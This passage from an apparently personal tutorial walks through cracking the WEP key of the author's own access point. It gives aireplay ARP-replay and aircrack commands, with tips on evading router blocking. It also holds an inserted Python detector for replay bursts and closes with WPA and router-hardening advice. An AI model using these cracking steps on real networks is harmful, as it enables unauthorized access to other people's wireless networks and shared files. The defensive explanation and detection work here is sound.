to capture packets just from my access point - where 00:18:f8:65:fe:41 is the BSSID of the AP.
Airodump looks similar to Kismet, but there are no selectable objects on the screen; it gets right down to it, capturing packets and storing them in the .cap file as defined in the command. You’ll notice Airodump keeps a running count of all the packets captured, and better yet, shows you the number of IVs collected.

The waiting game


The hard truth is that you will need to collect nearly 150,000 IVs to crack a 64 bit WEP key, and around 600,000 IVs to crack a 128 bit WEP key. This number varies, but is mostly dependent on how lucky you are. If you watch the IV count in Airodump, you’ll notice that, under normal circumstances, it does not rise rapidly.
This can cause a problem; particularly if you’re as impatient as I am. Let’s take a look at some ways we can speed up this process.
Until now, we’ve been using a method known as a passive attack. A passive attack is basically doing nothing other than passively capturing packets until you have achieved enough data to perform the crack.
Most access points need their clients to re-associate after a certain period of time to confirm their connection; therefore, the AP will send out an Address Resolution Protocol (ARP) packet. The ARP packet is unique in that it is always addressed to the MAC address FF:FF:FF:FF:FF:FF, usually has a size of 68 bytes, and has the ToDS flag set.
We can use this information to implement an ARP replay attack. For this method, we will be using Aireplay (part of the Aircrack Suite). Aireplay can be used to actually re-send packets that it has received.
Leave Airodump running, and open a new command window. The command we’ll be using for Aireplay is:
aireplay -i -m 68 -n 68 -d ff:ff:ff:ff:ff:ff -b 00:18:f8:65:fe:41 eth0
The -i tells Aireplay to capture packets on the fly; the -m 68 and -n 68 tell Aireplay that you only want it to replay packets that are 68 bytes. The -d and -b are the destination MAC address and the AP MAC address (BSSID) respectively. These are the criteria that define our ARP packet, which is usually associated with an IV.
Alternatively, you may have already captured one of these packets. You can have Aireplay check the .cap file from Airodump with the -f switch:
aireplay -f george.cap -m 68 -n 68 -d ff:ff:ff:ff:ff:ff -b 00:18:f8:65:fe:41 eth0
In either case, if Aireplay finds a match to our specifications, it will show you the details of the packet and ask if you would like to replay it. If the details look exactly as shown below, press ‘y’ for yes.
FromDS = 0, ToDS = 1
BSSID =
Src. MAC =
Dst. MAC = ff:ff:ff:ff:ff:ff
Aireplay will then begin to replay the packet; if you’ve found a winning packet, you will notice your packet and IV count in Airodump rise extremely quickly. If not, only the packet count in Airodump will rise; if this is the case, press CTRL+C to abort the operation, restart Aireplay, and try again.
It has been noted that some routers will detect this erratic behavior and block the MAC address of the WNIC you are using. Adding a -x switch followed by a “replays per second #” will slow down the rate at which Aireplay replays these packets.
If you're lucky enough, you will have collected enough IVs in little time. For me, it took 28 minutes including booting up, writing down the network specs, and typing all those lengthy commands.
There are other methods such as deauth attacks, which force the clients off the AP, causing them to have to re-associate; but these methods require a second computer.
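The defender's side of the ARP replay behaviour described above, which the text notes some routers already block on: an added example that is not part of the original tutorial. It runs over constructed frame records (the fields Airodump displays, not a real capture) and flags a source that sends a burst of broadcast ToDS frames of ARP size all carrying the same IV, since a genuine client advances the IV on every frame while a replayed frame cannot.

```python
from collections import Counter, defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
ARP_WEP_LEN = 68  # typical on-air size of a WEP-encrypted ARP request, as noted above

# Constructed sample records, not a real capture: (time_s, src_mac, dst_mac, length, to_ds, iv_hex).
# The first three frames are ordinary client traffic; the rest are 300 copies of the
# second ARP request, which is what an injector replaying a captured frame produces.
SAMPLE = [
    (0.00, "00:11:22:33:44:55", BROADCAST, 68, 1, "1a2b3c"),
    (0.10, "00:11:22:33:44:55", "00:18:f8:65:fe:41", 132, 1, "1a2b3d"),
    (1.50, "00:11:22:33:44:55", BROADCAST, 68, 1, "1a2b3e"),
] + [
    (2.0 + i * 0.002, "00:11:22:33:44:55", BROADCAST, 68, 1, "1a2b3e")
    for i in range(300)
]


def find_replay_bursts(frames, window_s=1.0, min_frames=100):
    """Return [(src_mac, iv_hex, count)] for every source that sends at least
    min_frames broadcast ToDS frames of ARP size carrying the *same* IV inside
    any window_s-second window. A genuine WEP client advances the IV on each new
    frame, so many identical IVs in a short burst mean the frame is being replayed."""
    by_src = defaultdict(list)
    for t, src, dst, length, to_ds, iv in frames:
        if dst == BROADCAST and length == ARP_WEP_LEN and to_ds == 1:
            by_src[src].append((t, iv))

    alerts = []
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window so it spans at most window_s seconds
            while events[end][0] - events[start][0] > window_s:
                start += 1
            iv, count = Counter(v for _, v in events[start:end + 1]).most_common(1)[0]
            if count >= min_frames:
                alerts.append((src, iv, count))
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for src, iv, count in find_replay_bursts(SAMPLE):
        print(f"possible ARP replay from {src}: IV {iv} seen {count} times within 1 s")
```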

The crack

Two of the most popular programs used for actually cracking the WEP key are Airsnort and Aircrack. Airsnort can be used with the .dump files that Kismet provides; and Aircrack can be used with the .cap files that Airodump provides.
Airsnort can be used on its own without any other software capturing packets; although, it has been reported to be extremely unstable in this state, and you should probably not chance losing all your captured data. A better method would be to let Airsnort recover the encryption key from your Kismet .dump file. Kismet and Airsnort can run simultaneously.
For this demonstration, we’ll be using Aircrack. You can use Airodump to capture the packets, and Aircrack to crack the encryption key at the same time.
With Airodump running, open a new command window and type:
aircrack -f 3 -n 64 -q 3 george.cap
The -f switch followed by a number is the fudge factor, a variable that the program uses to define how thoroughly it scans the .cap file. A larger number will give you a better chance of finding the key, but will usually take longer. The default is 2.
The -n switch followed by 64 represents that you are trying to crack a WEP 64 key. I knew because it was a setup; in the real world there is no way to determine what WEP key length a target access point is using. You may have to try both 64 and 128.
The -q 3 switch was used to display the progress of the software. It can be left out altogether to provide a faster crack; although, if you’ve obtained enough unique IVs, you should not be waiting more than a couple minutes.
A -m switch can be used, followed by a MAC address, to filter a specific AP’s usable packets; this would come in handy if you were collecting packets from multiple APs in Airodump.
Aircrack recovered my WEP 64 key within 1 minute using 76,000 unique IVs; the whole process took around 34 minutes.
The same experiment was repeated with WEP 128 and it took about 43 minutes. The reason it was not substantially longer is because I simply let Aireplay replay more packets. Sometimes you can get lucky and capture an ARP Request packet within a few minutes; otherwise, it could take a couple hours.
After I had access to the network, many doors opened up. Aside from having access to the Internet, I was able to use Networkview – a network discovery tool – to obtain my network’s workgroup name. From there, I had access to all the shared files on my drives.
While I’m no expert in the subject, I can at least assume that many horrible things could happen if the wrong hands were to obtain my WLAN encryption key. 

The conclusion


Always use WPA or WPA2 encryption when possible. If you're using WPA with a pre-shared key, use a strong password; hackers can use dictionary attacks, and they will be quite effective if you have an easy password. You may want to use a strong password generator like the one at grc.com.
If your access point supports it, you may want to consider disabling wireless SSID broadcast; however, this may raise some issues with the AP's clients recognizing it. (Kismet will still recognize it)
Many routers will allow you to filter what clients can access the network; this is known as Wireless MAC Filtering. If you know the MAC address of the clients you are using, you can enter them into your configuration utility as “Permit ONLY”. This is not a 100% effective method; MAC addresses can be cloned to match the AP’s associated clients, but it does provide you with a slightly higher level of security. (there is a utility on Auditor to allow you to do this)
By default, your router may be set to mixed mode; this allows 802.11b and 802.11g devices to access your network. If you use only 802.11g devices, set your router to G-ONLY. Had my router been set this way, I would have never been able to do any of this. The Orinoco Gold card is 802.11b, and is obviously not compatible with an 802.11g network. Many 802.11g cards are not supported by the software we’ve used in this tutorial, but a few are. While you're at it, please change your default router username and password.
While I haven’t tried my hand at cracking a WPA encryption, the methods are similar when the WLANs use pre-shared keys (psk); I do plan on trying it, and I will surely write an update to let you know how/if it was done.
By no means am I claiming to be an expert in this field; if you’ve noticed anything that was incorrect or just have something to add, please feel free to drop a comment.



Thanks,

Regards,
Zulqurnain jutt